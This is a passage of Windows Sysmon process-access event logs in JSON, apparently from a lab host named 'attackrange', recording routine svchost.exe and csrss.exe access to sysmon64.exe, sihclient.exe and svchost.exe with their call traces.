07:56:07.919","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3929,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:07.919\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:07.919","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3930,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:07.919\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:07.919","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3931,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:07.919\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 1872\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2017-5F25-0000-00108FE50500}\r\nTargetProcessId: 616\r\nTargetImage: C:\\Windows\\System32\\sihclient.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|c:\\windows\\system32\\UBPM.dll+a711|c:\\windows\\system32\\UBPM.dll+f974|c:\\windows\\system32\\UBPM.dll+cd3c|c:\\windows\\system32\\UBPM.dll+d305|c:\\windows\\system32\\UBPM.dll+dc05|c:\\windows\\system32\\UBPM.dll+e91d|c:\\windows\\system32\\UBPM.dll+e12a|c:\\windows\\system32\\UBPM.dll+dd82|c:\\windows\\system32\\EventAggregation.dll+3e22|c:\\windows\\system32\\EventAggregation.dll+36c9|c:\\windows\\system32\\EventAggregation.dll+332f|c:\\windows\\system32\\EventAggregation.dll+2e28|C:\\Windows\\SYSTEM32\\ntdll.dll+64ed5|C:\\Windows\\SYSTEM32\\ntdll.dll+64bdd|C:\\Windows\\SYSTEM32\\ntdll.dll+64a40|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+2a073|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:07.919","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","SourceProcessId":"1140","SourceThreadId":"1872","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2017-5F25-0000-00108FE50500}","TargetProcessId":"616","TargetImage":"C:\\Windows\\System32\\sihclient.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|c:\\windows\\system32\\UBPM.dll+a711|c:\\windows\\system32\\UBPM.dll+f974|c:\\windows\\system32\\UBPM.dll+cd3c|c:\\windows\\system32\\UBPM.dll+d305|c:\\windows\\system32\\UBPM.dll+dc05|c:\\windows\\system32\\UBPM.dll+e91d|c:\\windows\\system32\\UBPM.dll+e12a|c:\\windows\\system32\\UBPM.dll+dd82|c:\\windows\\system32\\EventAggregation.dll+3e22|c:\\windows\\system32\\EventAggregation.dll+36c9|c:\\windows\\system32\\EventAggregation.dll+332f|c:\\windows\\system32\\EventAggregation.dll+2e28|C:\\Windows\\SYSTEM32\\ntdll.dll+64ed5|C:\\Windows\\SYSTEM32\\ntdll.dll+64bdd|C:\\Windows\\SYSTEM32\\ntdll.dll+64a40|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+2a073|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3932,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:07.919\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:07.919","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3933,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:07.919\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:07.919","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3934,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:07.919\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2017-5F25-0000-00108FE50500}\r\nTargetProcessId: 616\r\nTargetImage: C:\\Windows\\System32\\sihclient.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:07.919","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2017-5F25-0000-00108FE50500}","TargetProcessId":"616","TargetImage":"C:\\Windows\\System32\\sihclient.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:56:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3935,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:07.919\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:07.919","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3936,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:07.919\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:07.919","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 